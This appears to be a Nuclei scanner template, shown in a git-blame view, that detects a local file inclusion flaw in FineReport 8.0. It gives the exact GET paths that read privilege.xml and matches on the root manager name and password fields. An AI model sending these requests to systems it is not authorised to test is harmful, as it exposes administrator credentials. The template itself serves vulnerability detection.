2021-02-20 16:36:48 +00:00
|
|
|
id: finereport-path-traversal
|
|
|
|
|
|
|
|
info:
|
2022-07-27 20:17:31 +00:00
|
|
|
name: FineReport 8.0 - Local File Inclusion
|
2021-02-20 16:36:48 +00:00
|
|
|
author: pikpikcu
|
2022-08-29 20:21:30 +00:00
|
|
|
severity: high
|
2022-07-27 20:17:31 +00:00
|
|
|
description: FIneReport 8.0 is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
2023-04-12 14:31:38 +00:00
|
|
|
- https://web.archive.org/web/20200506020241/http://foreversong.cn/archives/1378
|
2022-07-27 20:17:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-08-22 11:28:57 +00:00
|
|
|
tags: finereport,lfi
|
2021-02-20 16:36:48 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-02-20 16:36:48 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
|
|
|
|
- "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<rootManagerName>"
|
|
|
|
- "<rootManagerPassword>"
|
|
|
|
part: body
|
2021-02-20 17:11:54 +00:00
|
|
|
condition: and
|
2021-02-20 16:36:48 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022100d7e6097fe29bbee7befafcdc65dc27c414850fc65f0b35507318a34274d87049022064b9af6582aca8cb39a6781b14aa43241d166522612e3aff32ae5f4a53616be7:922c64590222798bb761d5b6d8e72950
|